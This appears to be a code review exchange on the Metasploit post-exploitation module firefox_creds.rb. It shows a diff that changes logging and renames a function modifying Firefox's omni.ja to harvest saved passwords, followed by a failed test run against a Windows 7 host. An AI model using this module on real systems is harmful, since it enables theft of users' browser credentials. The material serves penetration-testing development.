modules/post/multi/gather/firefox_creds.rb

```diff
@@ -329,31 +407,36 @@ def get_ff_and_loot_path
 
     @paths['ff'] = check_paths.find do |p|
       check = p.sub(/(\\|\/)(mozilla\s)?firefox.*/i, '')
-      print_status("Checking for Firefox directory in: #{check}")
+      vprint_status("Checking for Firefox directory in: #{check}")
       if directory?(p.sub(/(\\|\/)$/, ''))
-        print_good("Found Firefox directory")
+        print_good("Found Firefox directory: #{check}")
         true
       else
-        print_error("No Firefox directory found")
+        #vprint_error("No Firefox directory found")
         false
       end
     end
 
-    return false if @paths['ff'].nil?
+    if @paths['ff'].nil?
+      print_error("No Firefox directory found")
+      return false
+    end
 
     @paths['loot'] = tmpdir + loot_file
     return true
-
   end
 
-  def modify_omnija(zip)
+
+  def decrypt_modify_omnija(zip)
+    # Which files to extract from ja/zip
     files = [
-                'components/storage-mozStorage.js',
-                'chrome/toolkit/content/passwordmgr/passwordManager.xul',
-                'chrome/toolkit/content/global/commonDialog.xul',
-                'jsloader/resource/gre/components/storage-mozStorage.js'
+              'components/storage-mozStorage.js',                        # stor_js
+              'chrome/toolkit/content/passwordmgr/passwordManager.xul',  # pwd_xul
+              'chrome/toolkit/content/global/commonDialog.xul',          # dlog_xul
+              'jsloader/resource/gre/components/storage-mozStorage.js'   # res_js (not 100% sure why this is used)
```

Comment:
It's raising an exception on because this file isn't on the downloaded ja

```
msf post(firefox_creds) > run

[*] Determining session platform and type
[*] Checking for Firefox directory in: C:\Program Files
[+] Found Firefox directory: C:\Program Files
[*] Downloading C:\Program Files\Mozilla Firefox\omni.ja to: /var/folders/hk/c5t__dpn1fx319m6z5m486bh29hq99/T/txLEl.ja (11.54 MB)
[*] Injecting into: /var/folders/hk/c5t__dpn1fx319m6z5m486bh29hq99/T/txLEl.ja
[-] Post failed: Errno::ENOENT No such file or directory - components/storage-mozStorage.js
[-] Call stack:
[-]   /Users/jvazquez/.rvm/gems/ruby-2.1.6@metasploit-framework/gems/rubyzip-1.1.7/lib/zip/file.rb:360:in `get_entry'
[-]   /Users/jvazquez/.rvm/gems/ruby-2.1.6@metasploit-framework/gems/rubyzip-1.1.7/lib/zip/file.rb:230:in `get_input_stream'
[-]   /Users/jvazquez/.rvm/gems/ruby-2.1.6@metasploit-framework/gems/rubyzip-1.1.7/lib/zip/file.rb:262:in `read'
[-]   /Users/jvazquez/Projects/Code/metasploit-framework/modules/post/multi/gather/firefox_creds.rb:442:in `block in decrypt_modify_omnija'
[-]   /Users/jvazquez/Projects/Code/metasploit-framework/modules/post/multi/gather/firefox_creds.rb:440:in `map'
[-]   /Users/jvazquez/Projects/Code/metasploit-framework/modules/post/multi/gather/firefox_creds.rb:440:in `decrypt_modify_omnija'
[-]   /Users/jvazquez/Projects/Code/metasploit-framework/modules/post/multi/gather/firefox_creds.rb:150:in `block in run'
[-]   /Users/jvazquez/.rvm/gems/ruby-2.1.6@metasploit-framework/gems/rubyzip-1.1.7/lib/zip/file.rb:99:in `open'
[-]   /Users/jvazquez/Projects/Code/metasploit-framework/modules/post/multi/gather/firefox_creds.rb:149:in `run'
[*] Post module execution completed
```

My target (Windows 7 SP1) has Firefox 39.0 installed